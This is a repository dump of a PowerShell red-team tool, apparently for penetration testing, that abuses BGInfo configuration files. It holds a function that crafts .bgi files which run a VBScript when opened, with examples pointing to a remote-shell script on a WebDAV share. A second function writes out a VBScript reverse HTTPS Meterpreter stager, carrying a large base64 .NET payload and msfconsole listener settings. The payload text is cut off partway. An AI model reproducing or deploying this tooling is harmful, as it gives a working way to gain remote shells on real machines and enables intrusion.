├── BGI-File-Structure.png ├── BGITool_1.0.ps1 └── README.md /BGI-File-Structure.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/api0cradle/BGInfo/fa445c9bd3cb5eab2aef3845a0e1091bb00f071c/BGI-File-Structure.png -------------------------------------------------------------------------------- /BGITool_1.0.ps1: -------------------------------------------------------------------------------- 1 | function New-BGIFile 2 | { 3 | <# 4 | .SYNOPSIS 5 | 6 | Generates a BGI file that can execute VBS code. 7 | Author: Oddvar Moe (@oddvarmoe) - https://msitpros.com 8 | License: BSD 3-Clause 9 | Required Dependencies: None 10 | Optional Dependencies: None 11 | 12 | 13 | .DESCRIPTION 14 | 15 | New-BGIFile creates a .bgi file that includes path to VBS script that will execute when opened. 16 | More details on how this works can be found here: 17 | https://msitpros.com/?p=3831 18 | 19 | 20 | .PARAMETER FileName 21 | 22 | Specifies the name of the .bgi you want to create. Ex: hack.bgi 23 | 24 | 25 | .PARAMETER Script 26 | 27 | Specifies the path to the script that will execute when the .bgi file is opened. 28 | Ex: "\\10.10.10.10\webdav\remoteshell.vbs" 29 | or if the bgi file is saved togheter with the vbs file: "remoteshell.vbs" 30 | 31 | 32 | .PARAMETER OutFilePath 33 | 34 | Specifies the path to where the .bgi file should be created. 35 | This parameter is set to the current working directory by default. 36 | 37 | 38 | .EXAMPLE 39 | 40 | New-BGIFile -FileName "MyEvilBGIFile.bgi" -Script "RemoteShell.vbs" 41 | Description 42 | ----------- 43 | Creates a BGI file named MyEvilBGIFile.bgi in the current working directory. 44 | The path to the script it should execute is set to RemoteShell.vbs. 45 | 46 | 47 | .EXAMPLE 48 | 49 | New-BGIFile -FileName "MyEvilBGIFile.bgi" -Script "\\10.10.10.10\webdav\RemoteShell.vbs" -OutFilePath "C:\BGIFileFolder" 50 | Description 51 | ----------- 52 | Creates a BGI file named MyEvilBGIFile.bgi in the C:\BGIFileFolder directory. 53 | The path to the script it should execute is set to \\10.10.10.10\webdav\RemoteShell.vbs. 54 | 55 | 56 | .LINK 57 | https://msitpros.com/?p=3831 58 | #> 59 | [CmdletBinding()] 60 | Param 61 | ( 62 | [Parameter(Mandatory=$true)] 63 | [String] 64 | $FileName, 65 | 66 | [Parameter(Mandatory=$true)] 67 | [String] 68 | $Script, 69 | 70 | [Parameter()] 71 | [String] 72 | $OutFilePath = $PWD 73 | ) 74 | 75 | Begin 76 | { 77 | } 78 | Process 79 | { 80 | $BGITemplate = "CwAAAEJhY2tncm91bmQABAAAAAQAAAAAAAAACQAAAFBvc2l0aW9uAAQAAAAEAAAA/gMAAAgAAABNb25pdG9yAAQAAAAEAAAAXAQAAA4AAABUYXNrYmFyQWRqdXN0AAQAAAAEAAAAAQAAAAsAAABUZXh0V2lkdGgyAAQAAAAEAAAAwHsAAAsAAABPdXRwdXRGaWxlAAEAAAASAAAAJVRlbXAlXEJHSW5mby5ibXAACQAAAERhdGFiYXNlAAEAAAABAAAAAAwAAABEYXRhYmFzZU1SVQABAAAABAAAAAAAAAAKAAAAV2FsbHBhcGVyAAEAAAABAAAAAA0AAABXYWxscGFwZXJQb3MABAAAAAQAAAAFAAAADgAAAFdhbGxwYXBlclVzZXIABAAAAAQAAAABAAAADQAAAE1heENvbG9yQml0cwAEAAAABAAAAAAAAAAMAAAARXJyb3JOb3RpZnkABAAAAAQAAAAAAAAACwAAAFVzZXJTY3JlZW4ABAAAAAQAAAABAAAADAAAAExvZ29uU2NyZWVuAAQAAAAEAAAAAAAAAA8AAABUZXJtaW5hbFNjcmVlbgAEAAAABAAAAAAAAAAOAAAAT3BhcXVlVGV4dEJveAAEAAAABAAAAAAAAAAEAAAAUlRGAAEAAADWAAAAe1xydGYxXGFuc2lcYW5zaWNwZzEyNTJcZGVmZjBcZGVmbGFuZzEwNDR7XGZvbnR0Ymx7XGYwXGZuaWxcZmNoYXJzZXQwIEFyaWFsO319DQp7XGNvbG9ydGJsIDtccmVkMjU1XGdyZWVuMjU1XGJsdWUyNTU7fQ0KXHZpZXdraW5kNFx1YzFccGFyZFxmaS0yODgwXGxpMjg4MFx0eDI4ODBcY2YxXGJccHJvdGVjdFxmczI0IDxGaWVsZD5ccHJvdGVjdDBccGFyDQpccGFyDQp9DQoAAAsAAABVc2VyRmllbGRzAACAAIAAAAAABgAAAEZpZWxkAAEAAAAOAAAANFRlbXBsYXRlLnZicwAAAAAAAYAAgAAAAAA=" 81 | $ByteArray = [System.Convert]::FromBase64String($BGITemplate) #Convert to Byte array 82 | 83 | #Static content from template 84 | $Part1 = $ByteArray[0..745] 85 | 86 | # Byte needs to be length of script name + 2 87 | #$Part2 = $ByteArray[746] 88 | $BGIFileLength = $Script.Length+2 89 | $Part2 = [System.Convert]::ToByte($BGIFileLength) 90 | 91 | #Static content from template 92 | $Part3 = $ByteArray[747..750] 93 | 94 | # Bytes that represents script name from template 95 | #$Part4 = $ByteArray[751..762] 96 | $UTF8 = [system.Text.Encoding]::UTF8 97 | $Part4 = $UTF8.GetBytes($Script) 98 | 99 | # Static content 100 | $Part5 = $ByteArray[763..776] 101 | 102 | # Combine parts into new binary file 103 | $OutFile = New-Object byte[] 0 104 | $OutFile += $Part1 105 | $OutFile += $Part2 106 | $OutFile += $Part3 107 | $OutFile += $Part4 108 | $OutFile += $Part5 109 | 110 | #Create outfile folder if it is missing 111 | if(!(test-path $OutFilePath)) 112 | { 113 | New-Item -path $OutFilePath -type Directory 114 | } 115 | 116 | #Write the $Outfile 117 | [System.IO.File]::WriteAllBytes("$OutFilePath\$FileName", $OutFile) 118 | } 119 | End 120 | { 121 | } 122 | } 123 | 124 | 125 | function New-VBSWebMeter 126 | { 127 | <# 128 | .Synopsis 129 | 130 | Generates a VBS file that contains Reverse HTTPS Meterpreter. 131 | Author: Oddvar Moe (@oddvarmoe) - https://msitpros.com 132 | Author of VBSWebMeter: Cn33liz (@Cneelis) - https://github.com/Cn33liz/VBSMeter/blob/master/VBSWebMeter/VBSWebMeter.vbs 133 | Required Dependencies: None 134 | Optional Dependencies: None 135 | 136 | 137 | .DESCRIPTION 138 | 139 | New-VBSWebMEter creates a VBS file that uses Reverse HTTPS Meterpreter. 140 | 141 | 142 | .EXAMPLE 143 | 144 | New-VBSWebMeter -RHOST "10.10.10.10" -RPORT "443" -HTTPS "YES" -OutFilePath "C:\BGIPayload" -OutFile "MyVBSWebMeter.vbs" 145 | Description 146 | ----------- 147 | Creates a VBS file named MyVBSWebMeter.vbs in the C:\BGIPayLoad directory. 148 | When the VBS script is executed it will try to connect to 10.10.10.10 on port 443 and encrypted using HTTPS. 149 | #> 150 | [CmdletBinding()] 151 | Param 152 | ( 153 | [Parameter(Mandatory=$true)] 154 | $RHOST, 155 | 156 | [ValidateRange(1,65535)] 157 | [Parameter(Mandatory=$true)] 158 | $RPORT, 159 | 160 | [ValidateSet(“Yes”,”No”)] 161 | [Parameter(Mandatory=$true)] 162 | $HTTPS, 163 | 164 | [Parameter()] 165 | [String] 166 | $OutFilePath = $PWD, 167 | 168 | [Parameter(Mandatory=$true)] 169 | $OutFile 170 | ) 171 | 172 | Begin 173 | { 174 | } 175 | Process 176 | { 177 | $Code = @" 178 | '____ ______________ ___________ __ ___. _____ __ 179 | '\ \ / /\______ \/ _____/ \ / \ ____\_ |__ / \ _____/ |_ ___________ 180 | ' \ Y / | | _/\_____ \\ \/\/ // __ \| __ \ / \ / \_/ __ \ __\/ __ \_ __ \ 181 | ' \ / | | \/ \\ /\ ___/| \_\ \/ Y \ ___/| | \ ___/| | \/ 182 | ' \___/ |______ /_______ / \__/\ / \___ >___ /\____|__ /\___ >__| \___ >__| 183 | ' \/ \/ \/ \/ \/ \/ \/ \/ 184 | 185 | 'VBScript Reversed HTTP/HTTPS Meterpreter Stager - by Cn33liz 2017 186 | 'CSharp Meterpreter Stager build by Cn33liz and embedded within VBScript using DotNetToJScript from James Forshaw 187 | 'https://github.com/tyranid/DotNetToJScript 188 | 189 | 'This Stager is Proxy aware and should run on x86 as well as x64 190 | 191 | 'Usage: 192 | 'Change RHOST, RPORT and UseHTTPS to suit your needs: 193 | 194 | Dim RHOST: RHOST = "$RHOST" ' <- MSF Listner IP or Hostname 195 | Dim RPORT: RPORT = "$RPORT" ' <- MSF Listner Port 196 | Dim UseHTTPS: UseHTTPS = "$HTTPS" ' <- Use HTTPS or plain HTTP Payloads: yes/no 197 | 198 | 'Start Msfconsole: 199 | 'use exploit/multi/handler 200 | 'set PAYLOAD windows/x64/meterpreter/reverse_https <- When running HTTPS Payload from x64 version of wscript.exe 201 | 'set PAYLOAD windows/x64/meterpreter/reverse_http <- When running HTTP Payload from x64 version of wscript.exe 202 | 'set PAYLOAD windows/meterpreter/reverse_https <- When running HTTPS Payload from x86 version of wscript.exe 203 | 'set PAYLOAD windows/meterpreter/reverse_http <- When running HTTP Payload from x86 version of wscript.exe 204 | 'set LHOST 0.0.0.0 205 | 'set LPORT 443 206 | 'set AutoRunScript post/windows/manage/migrate NAME=notepad.exe 207 | 'set EnableUnicodeEncoding true 208 | 'set EnableStageEncoding true 209 | 'set ExitOnSession false 210 | 'exploit -j 211 | 212 | 'Then run: wscript.exe VBSWebMeter.vbs on Target 213 | 214 | Sub Debug(s) 215 | End Sub 216 | Sub SetVersion 217 | End Sub 218 | Function Base64ToStream(b) 219 | Dim enc, length, ba, transform, ms 220 | Set enc = CreateObject("System.Text.ASCIIEncoding") 221 | length = enc.GetByteCount_2(b) 222 | Set transform = CreateObject("System.Security.Cryptography.FromBase64Transform") 223 | Set ms = CreateObject("System.IO.MemoryStream") 224 | ms.Write transform.TransformFinalBlock(enc.GetBytes_4(b), 0, length), 0, ((length / 4) * 3) 225 | ms.Position = 0 226 | Set Base64ToStream = ms 227 | End Function 228 | 229 | Sub Run 230 | Dim s, entry_class 231 | s = "AAEAAAD/////AQAAAAAAAAAEAQAAACJTeXN0ZW0uRGVsZWdhdGVTZXJpYWxpemF0aW9uSG9sZGVy" 232 | s = s & "AwAAAAhEZWxlZ2F0ZQd0YXJnZXQwB21ldGhvZDADAwMwU3lzdGVtLkRlbGVnYXRlU2VyaWFsaXph" 233 | s = s & "dGlvbkhvbGRlcitEZWxlZ2F0ZUVudHJ5IlN5c3RlbS5EZWxlZ2F0ZVNlcmlhbGl6YXRpb25Ib2xk" 234 | s = s & "ZXIvU3lzdGVtLlJlZmxlY3Rpb24uTWVtYmVySW5mb1NlcmlhbGl6YXRpb25Ib2xkZXIJAgAAAAkD" 235 | s = s & "AAAACQQAAAAEAgAAADBTeXN0ZW0uRGVsZWdhdGVTZXJpYWxpemF0aW9uSG9sZGVyK0RlbGVnYXRl" 236 | s = s & "RW50cnkHAAAABHR5cGUIYXNzZW1ibHkGdGFyZ2V0EnRhcmdldFR5cGVBc3NlbWJseQ50YXJnZXRU" 237 | s = s & "eXBlTmFtZQptZXRob2ROYW1lDWRlbGVnYXRlRW50cnkBAQIBAQEDMFN5c3RlbS5EZWxlZ2F0ZVNl" 238 | s = s & "cmlhbGl6YXRpb25Ib2xkZXIrRGVsZWdhdGVFbnRyeQYFAAAAL1N5c3RlbS5SdW50aW1lLlJlbW90" 239 | s = s & "aW5nLk1lc3NhZ2luZy5IZWFkZXJIYW5kbGVyBgYAAABLbXNjb3JsaWIsIFZlcnNpb249Mi4wLjAu" 240 | s = s & "MCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5BgcAAAAH" 241 | s = s & "dGFyZ2V0MAkGAAAABgkAAAAPU3lzdGVtLkRlbGVnYXRlBgoAAAANRHluYW1pY0ludm9rZQoEAwAA" 242 | s = s & "ACJTeXN0ZW0uRGVsZWdhdGVTZXJpYWxpemF0aW9uSG9sZGVyAwAAAAhEZWxlZ2F0ZQd0YXJnZXQw" 243 | s = s & "B21ldGhvZDADBwMwU3lzdGVtLkRlbGVnYXRlU2VyaWFsaXphdGlvbkhvbGRlcitEZWxlZ2F0ZUVu" 244 | s = s & "dHJ5Ai9TeXN0ZW0uUmVmbGVjdGlvbi5NZW1iZXJJbmZvU2VyaWFsaXphdGlvbkhvbGRlcgkLAAAA" 245 | s = s & "CQwAAAAJDQAAAAQEAAAAL1N5c3RlbS5SZWZsZWN0aW9uLk1lbWJlckluZm9TZXJpYWxpemF0aW9u" 246 | s = s & "SG9sZGVyBgAAAAROYW1lDEFzc2VtYmx5TmFtZQlDbGFzc05hbWUJU2lnbmF0dXJlCk1lbWJlclR5" 247 | s = s & "cGUQR2VuZXJpY0FyZ3VtZW50cwEBAQEAAwgNU3lzdGVtLlR5cGVbXQkKAAAACQYAAAAJCQAAAAYR" 248 | s = s & "AAAALFN5c3RlbS5PYmplY3QgRHluYW1pY0ludm9rZShTeXN0ZW0uT2JqZWN0W10pCAAAAAoBCwAA" 249 | s = s & "AAIAAAAGEgAAACBTeXN0ZW0uWG1sLlNjaGVtYS5YbWxWYWx1ZUdldHRlcgYTAAAATVN5c3RlbS5Y" 250 | s = s & "bWwsIFZlcnNpb249Mi4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdh" 251 | s = s & "NWM1NjE5MzRlMDg5BhQAAAAHdGFyZ2V0MAkGAAAABhYAAAAaU3lzdGVtLlJlZmxlY3Rpb24uQXNz" 252 | s = s & "ZW1ibHkGFwAAAARMb2FkCg8MAAAAACAAAAJNWpAAAwAAAAQAAAD//wAAuAAAAAAAAABAAAAAAAAA" 253 | s = s & "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACAAAAADh+6DgC0Cc0huAFMzSFUaGlzIHByb2dy" 254 | s = s & "YW0gY2Fubm90IGJlIHJ1biBpbiBET1MgbW9kZS4NDQokAAAAAAAAAFBFAABMAQMAADMkWQAAAAAA" 255 | s = s & "AAAA4AAiIAsBMAAAGAAAAAYAAAAAAAAiNgAAACAAAABAAAAAAAAQACAAAAACAAAEAAAAAAAAAAQA" 256 | s = s & "AAAAAAAAAIAAAAACAAAAAAAAAwBAhQAAEAAAEAAAAAAQAAAQAAAAAAAAEAAAAAAAAAAAAAAA0DUA" 257 | s = s & "AE8AAAAAQAAA+AMAAAAAAAAAAAAAAAAAAAAAAAAAYAAADAAAAJg0AAAcAAAAAAAAAAAAAAAAAAAA" 258 | s = s & "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAgAAAIAAAAAAAAAAAAAAAIIAAASAAAAAAAAAAA" 259 | s = s & "AAAALnRleHQAAAAoFgAAACAAAAAYAAAAAgAAAAAAAAAAAAAAAAAAIAAAYC5yc3JjAAAA+AMAAABA" 260 | s = s & "AAAABAAAABoAAAAAAAAAAAAAAAAAAEAAAEAucmVsb2MAAAwAAAAAYAAAAAIAAAAeAAAAAAAAAAAA" 261 | s = s & "AAAAAABAAABCAAAAAAAAAAAAAAAAAAAAAAQ2AAAAAAAASAAAAAIABQCsIwAA7BAAAAEAAAAAAAAA" 262 | s = s & "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEzAFAKgAAAAB" 263 | s = s & "AAARKA8AAAoLEgEoEAAACmlzEQAACgoFcgEAAHAbbxIAAAosQwIcjQ8AAAElFnIJAABwoiUXA6Il" 264 | s = s & "GHIbAABwoiUZBIwcAAABoiUach8AAHCiJRsGKAgAAAaiKBMAAAoXKAkAAAYmK0ECHI0PAAABJRZy" 265 | s = s & "IwAAcKIlFwOiJRhyGwAAcKIlGQSMHAAAAaIlGnIfAABwoiUbBigIAAAGoigTAAAKFigJAAAGJhcq" 266 | s = s & "ChcqABMwBQA1AAAAAgAAEQONHQAAAQpyMwAAcAsWDCsZBggHAgdvFAAACm8VAAAKbxYAAAqdCBdY" 267 | s = s & "DAgDMuMGcxcAAAoq6gJvGAAACn4CAAAEJS0XJn4BAAAE/gYNAAAGcxkAAAolgAIAAAQoAQAAKygb" 268 | s = s & "AAAKIAABAABdH1z+ASoTMAQAtAAAAAMAABFzDgAABgoGAn0DAAAEcj8AAHALFgw4jAAAAAZ7AwAA" 269 | s = s & "BBkoBgAABgtyQQAAcCgYAAAKBnsEAAAEJS0YJgYG/gYPAAAGcxwAAAolEwR9BAAABBEEKAIAACso" 270 | s = s & "AwAAK3MXAAAKDRYTBSsxBwkRBW8WAAAKEwcSB/4WHQAAAW8fAAAKKCAAAAoTBhEGKAcAAAYsAxEG" 271 | s = s & "KhEFF1gTBREFCW8UAAAKMsUIF1gMCB9AP2z///9yvwAAcCobMAYAIAEAAAQAABEgABAAAAogACAA" 272 | s = s & "AAsfQAx+IQAACiZ+IQAACg0WEwQELBEU/gYFAAAGcyIAAAooIwAACnMkAAAKEwURBW8lAAAKcskA" 273 | s = s & "AHBy3wAAcG8mAAAKEQVvJQAACnI9AQBwcksBAHBvJgAAChEFbyUAAApyUwEAcHJzAQBwbyYAAAoR" 274 | s = s & "BW8lAAAKcpEBAHByrwEAcG8mAAAKFBMGAygnAAAKdCcAAAFvKAAAChMJEQksFREFKCkAAApvKgAA" 275 | s = s & "ChEFEQlvKwAAChEFA28sAAAKEwYRBo5pIKCGAQAvBRYTCt5E3gYmFhMK3jwGB2ATB34hAAAKEQaO" 276 | s = s & "aREHCCgBAAAGEwgRBhYRCBEGjmkoLQAAChYWEQgJFhIEKAIAAAYVKAMAAAYmFyoRCioBEAAAAACU" 277 | s = s & "AEfbAAYYAAABHgIoLgAACioucwwAAAaAAQAABCoKAypKAnsDAAAEGG8VAAAKGF0W/gEqAABCU0pC" 278 | s = s & "AQABAAAAAAAMAAAAdjIuMC41MDcyNwAAAAAFAGwAAAAsBQAAI34AAJgFAAAABwAAI1N0cmluZ3MA" 279 | s = s & "AAAAmAwAAPABAAAjVVMAiA4AABAAAAAjR1VJRAAAAJgOAABUAgAAI0Jsb2IAAAAAAAAAAgAAAVcV" 280 | s = s & "AhwJCgAAAPoBMwAWAAABAAAAKwAAAAQAAAAEAAAADwAAABsAAAAuAAAAEAAAAAQAAAABAAAAAgAA" 281 | s = s & "AAMAAAABAAAAAwAAAAIAAAADAAAAAADOAwEAAAAAAAYAqQIdBQYAFgMdBQYA9gHcBA8APQUAAAYA" 282 | s = s & "HgIeBAYAjAIeBAYAbQIeBAYA/QIeBAYAyQIeBAYA4gIeBAYANQIeBAYACgL+BAYA6AH+BAYAUAIe" 283 | s = s & "BAYATAbsAwYA8wPsAwYAdwHsAwYAnQFMBQoADgRMBQoA/wXNBg4AigDsAwoAegZvBgoA9QZvBgoA" 284 | s = s & "WARvBgYAzQEdBQYAVgPsAwYAZQTsAwYAhADsAwYAhwTsAw4AZAF7BAYATgDxAA4AXAB7BAYA1QTs" 285 | s = s & "AwoAaAPNBgoAkwRvBgoARARvBgoAMAQ1AQoAkgZvBgoAjgZvBgoAVAFvBgoAvANvBgoApwVvBgYA" 286 | s = s & "tAP+BAAAAACfAAAAAAABAAEAAQAQALwEAAA9AAEAAQADIRAA7QAAAD0AAQALAAMBEAAcAAAAPQAD" 287 | s = s & "AA4ANgCbADkBFgABAD0BBgDaBEUBBgAxAEkBAAAAAIAAkSAMAVEBAQAAAAAAgACRICQBWQEFAAAA" 288 | s = s & "AACAAJEgPwZkAQsAUCAAAAAAhgBaBmoBDQAEIQAAAACRAK0BcQEQAAghAAAAAJEARwN8ARQASSEA" 289 | s = s & "AAAAkQCRAIMBFgCEIQAAAACRAP4DiAEXAEQiAAAAAIYAcQCOARgAgCMAAAAAhhjIBAYAGgCIIwAA" 290 | s = s & "AACRGM4ElAEaAIAjAAAAAIYYyAQGABoAlCMAAAAAgwAKAJgBGgCAIwAAAACGGMgEBgAbAJcjAAAA" 291 | s = s & "AIMAOACdARsAAAABAB8GAAACAEADAAADAIABAAAEAGUGAAABAHoFAAACADQDAAADACkGAAAEALAE" 292 | s = s & "AAAFAI0FAAAGABkBAQABAG8BAQACAO8EAAABAKcEAAACAIkGAAADAM4AAAABAIwEAAACAIQGAAAD" 293 | s = s & "ABgEAAAEAA8GAAABANoEAAACADYGAAABADYGAAABANoEAAABAMIAAAACAM4AAAABAKoGAAABADYG" 294 | s = s & "CQDIBAEAEQDIBAYAGQDIBAoAKQDIBBAAMQDIBBAAOQDIBBAAQQDIBBAASQDIBBAAUQDIBBAAWQDI" 295 | s = s & "BBAAYQDIBBUAaQDIBBAAcQDIBBAAyQDIBAYAiQCiBiEAiQCdBSYAgQDIBAEA0QDiBSoA0QA4BjEA" 296 | s = s & "0QBdAz4AgQCdBkIA0QDpBUcA0QDIBEwA0QC8BlIADADIBF4A8QBTBmQA8QD6A4EAFADIBF4A8QCs" 297 | s = s & "BqIA8QC0BsAAeQBUA9EA0QA4BtUACQF2BOwAEQHIBF4AGQGMA+8AsQDIBAYAsQDzBfYAKQExAfwA" 298 | s = s & "MQHGAQIBMQHhBgkBQQHEBQ4BsQC0BRQBsQDrBhsBsQDXACEBWQHIBicBeQDIBAYALgALAKIBLgAT" 299 | s = s & "AKsBLgAbAMoBLgAjANMBLgArAPIBLgAzAPIBLgA7APIBLgBDANMBLgBLAPgBLgBTAPIBLgBbAPIB" 300 | s = s & "LgBjABACLgBrADoCQwBbAEcCYwBzAE0CgwBzAE0CGgA3AIoA2wB7AFcAmwAAAQMADAEBAAABBQAk" 301 | s = s & "AQEAAAEHAD8GAQAEgAAAAQAAAAAAAAAAAAAAAACoAAAAAgAAAAAAAAAAAAAAMAHkAAAAAAACAAAA" 302 | s = s & "AAAAAAAAAAAwAewDAAAAAAMABQAAAAAAAAAAADABkQEAAAAAAwACAAQAAgA1AHwAOwC7AD0AzQAA" 303 | s = s & "AAAAADw+OV9fNl8wADxjaGVja3N1bTg+Yl9fNl8wADw+Y19fRGlzcGxheUNsYXNzN18wADw+OV9f" 304 | s = s & "MAA8R2VuSFRUUENoZWNrc3VtPmJfXzAASUVudW1lcmFibGVgMQBJT3JkZXJlZEVudW1lcmFibGVg" 305 | s = s & "MQBHZXRTdGFnZTEAa2VybmVsMzIASW50MzIARnVuY2AyAGNoZWNrc3VtOAA8PjkAPE1vZHVsZT4A" 306 | s = s & "Q1NoYXJwLVdlYi1NZXRlcnByZXRlckRMTABMaXN0ZW5lclVSTABVc2VIVFRQUwBEb3dubG9hZERh" 307 | s = s & "dGEAbXNjb3JsaWIAPD5jAFN5c3RlbS5Db2xsZWN0aW9ucy5HZW5lcmljAFZpcnR1YWxBbGxvYwBs" 308 | s = s & "cFRocmVhZElkAENyZWF0ZVRocmVhZABBZGQAU3lzdGVtLkNvbGxlY3Rpb25zLlNwZWNpYWxpemVk" 309 | s = s & "AENyZWRlbnRpYWxDYWNoZQBFbnVtZXJhYmxlAGhIYW5kbGUARGF0ZVRpbWUAZmxBbGxvY2F0aW9u" 310 | s = s & "VHlwZQBTeXN0ZW0uQ29yZQBYNTA5Q2VydGlmaWNhdGUAVmFsaWRhdGVTZXJ2ZXJDZXJ0ZmljYXRl" 311 | s = s & "AENyZWF0ZQBDb21waWxlckdlbmVyYXRlZEF0dHJpYnV0ZQBHdWlkQXR0cmlidXRlAERlYnVnZ2Fi" 312 | s = s & "bGVBdHRyaWJ1dGUAQ29tVmlzaWJsZUF0dHJpYnV0ZQBBc3NlbWJseVRpdGxlQXR0cmlidXRlAEFz" 313 | s = s & "c2VtYmx5VHJhZGVtYXJrQXR0cmlidXRlAEFzc2VtYmx5RmlsZVZlcnNpb25BdHRyaWJ1dGUAQXNz" 314 | s = s & "ZW1ibHlDb25maWd1cmF0aW9uQXR0cmlidXRlAEFzc2VtYmx5RGVzY3JpcHRpb25BdHRyaWJ1dGUA" 315 | s = s & "Q29tcGlsYXRpb25SZWxheGF0aW9uc0F0dHJpYnV0ZQBBc3NlbWJseVByb2R1Y3RBdHRyaWJ1dGUA" 316 | s = s & "QXNzZW1ibHlDb3B5cmlnaHRBdHRyaWJ1dGUAQXNzZW1ibHlDb21wYW55QXR0cmlidXRlAFJ1bnRp" 317 | s = s & "bWVDb21wYXRpYmlsaXR5QXR0cmlidXRlAGR3U3RhY2tTaXplAGR3U2l6ZQBSYW5kb21TdHJpbmcA" 318 | s = s & "VG9TdHJpbmcAZ2V0X0xlbmd0aABSZW1vdGVDZXJ0aWZpY2F0ZVZhbGlkYXRpb25DYWxsYmFjawBz" 319 | s = s & "ZXRfU2VydmVyQ2VydGlmaWNhdGVWYWxpZGF0aW9uQ2FsbGJhY2sATWFyc2hhbABOZXR3b3JrQ3Jl" 320 | s = s & "ZGVudGlhbABDU2hhcnAtV2ViLU1ldGVycHJldGVyRExMLmRsbABTeXN0ZW0AUmFuZG9tAFN1bQBH" 321 | s = s & "ZW5IVFRQQ2hlY2tzdW0AWDUwOUNoYWluAGNoYWluAFN5c3RlbS5SZWZsZWN0aW9uAE5hbWVWYWx1" 322 | s = s & "ZUNvbGxlY3Rpb24AV2ViSGVhZGVyQ29sbGVjdGlvbgBXZWJFeGNlcHRpb24AU3RyaW5nQ29tcGFy" 323 | s = s & "aXNvbgBaZXJvAFN5c3RlbS5MaW5xAENoYXIAc2VuZGVyAFNlcnZpY2VQb2ludE1hbmFnZXIATGlz" 324 | s = s & "dGVuZXIAbHBQYXJhbWV0ZXIATWV0ZXJQcmV0ZXIALmN0b3IALmNjdG9yAEludFB0cgBTeXN0ZW0u" 325 | s = s & "RGlhZ25vc3RpY3MAZHdNaWxsaXNlY29uZHMAU3lzdGVtLlJ1bnRpbWUuSW50ZXJvcFNlcnZpY2Vz" 326 | s = s & "AFN5c3RlbS5SdW50aW1lLkNvbXBpbGVyU2VydmljZXMARGVidWdnaW5nTW9kZXMAU3lzdGVtLlNl" 327 | s = s & "Y3VyaXR5LkNyeXB0b2dyYXBoeS5YNTA5Q2VydGlmaWNhdGVzAGxwVGhyZWFkQXR0cmlidXRlcwBk" 328 | s = s & "d0NyZWF0aW9uRmxhZ3MAZ2V0X1RpY2tzAElDcmVkZW50aWFscwBzZXRfQ3JlZGVudGlhbHMAZ2V0" 329 | s = s & "X0RlZmF1bHROZXR3b3JrQ3JlZGVudGlhbHMARXF1YWxzAGdldF9DaGFycwBnZXRfSGVhZGVycwBT" 330 | s = s & "c2xQb2xpY3lFcnJvcnMAc3NsUG9saWN5RXJyb3JzAGxwQWRkcmVzcwBscFN0YXJ0QWRkcmVzcwBD" 331 | s = s & "b25jYXQAV2FpdEZvclNpbmdsZU9iamVjdABTZWxlY3QATVNGQ29ubmVjdABmbFByb3RlY3QAU3lz" 332 | s = s & "dGVtLk5ldABXZWJDbGllbnQAY2VydABQb3J0AEh0dHBXZWJSZXF1ZXN0AE5leHQAZ2V0X05vdwB4" 333 | s = s & "AE9yZGVyQnkAVG9BcnJheQBUb0NoYXJBcnJheQBDb3B5AFN5c3RlbS5OZXQuU2VjdXJpdHkAZ2V0" 334 | s = s & "X1Byb3h5AHNldF9Qcm94eQBJV2ViUHJveHkAAAAHeQBlAHMAABFoAHQAdABwAHMAOgAvAC8AAAM6" 335 | s = s & "AAADLwAAD2gAdAB0AHAAOgAvAC8AAAtjAGgAYQByAHMAAAEAfW8ASABEADkARQBqAEoAYwBJAFQA" 336 | s = s & "cQBoAFYAWQBsAGUARgBSAFgANAA3AHMATgBMAHQASwB4ADYAZwBXAG4ARwA4AHcAVQAwAGkAYQBQ" 337 | s = s & "ADUAQwAxAHAAZABTAHIAYgBNAHUAWgBmAEIAegBtAHkAdgBrADIAMwBPAEEAUQAACTkAdgBYAFUA" 338 | s = s & "ABVVAHMAZQByAC0AQQBnAGUAbgB0AAFdTQBvAHoAaQBsAGwAYQAvADQALgAwACAAKABjAG8AbQBw" 339 | s = s & "AGEAdABpAGIAbABlADsAIABNAFMASQBFACAANgAuADEAOwAgAFcAaQBuAGQAbwB3AHMAIABOAFQA" 340 | s = s & "KQAADUEAYwBjAGUAcAB0AAAHKgAvACoAAB9BAGMAYwBlAHAAdAAtAEwAYQBuAGcAdQBhAGcAZQAB" 341 | s = s & "HWUAbgAtAGcAYgAsAGUAbgA7AHEAPQAwAC4ANQABHUEAYwBjAGUAcAB0AC0AQwBoAGEAcgBzAGUA" 342 | s = s & "dAABPUkAUwBPAC0AOAA4ADUAOQAtADEALAB1AHQAZgAtADgAOwBxAD0AMAAuADcALAAqADsAcQA9" 343 | s = s & "ADAALgA3AAEAAADMvdkMZvC9SZHy/GkicRIHAAQgAQEIAyAAAQUgAQEREQQgAQEOBCABAQIGBwIS" 344 | s = s & "QRFFBAAAEUUDIAAKBiACAg4RbQUAAQ4dHAYHAx0DDggDIAAIBCABCAgEIAEDCAUgAQEdAwQgAB0D" 345 | s = s & "BhUSVQIDCAUgAgEcGBcQAgIVEn0BHgEVEn0BHgAVElUCHgAeAQQKAgMICAABCBUSfQEIEAcIEhAO" 346 | s = s & "CA4VElUCAwIIDgMGFRJVAgMCGBACAhUSgIEBHgAVEn0BHgAVElUCHgAeAQQKAgMCDBABAR0eABUS" 347 | s = s & "fQEeAAMKAQMDIAAOBQACDg4OEAcLCQkJGAkSWR0FCRgSXQICBhgGAAEBEoCJBSAAEoCRBSACAQ4O" 348 | s = s & "BgABEoCZDgQgABJdBQAAEoClBiABARKAqQUgAQESXQUgAR0FDggABAEdBQgYCAi3elxWGTTgiQMG" 349 | s = s & "EgwHBhUSVQIDCAMGEkEHBhUSVQIDAgcABBgYCQkJCgAGGAkJGBgJEAkFAAIJGAkGIAMCDggOCgAE" 350 | s = s & "AhwSSRJNEVEGAAIOEkEIBAABAg4FAAEOEkEFIAICDgIDAAABBCABCAMEIAECAwgBAAgAAAAAAB4B" 351 | s = s & "AAEAVAIWV3JhcE5vbkV4Y2VwdGlvblRocm93cwEIAQACAAAAAAAeAQAZQ1NoYXJwLVdlYi1NZXRl" 352 | s = s & 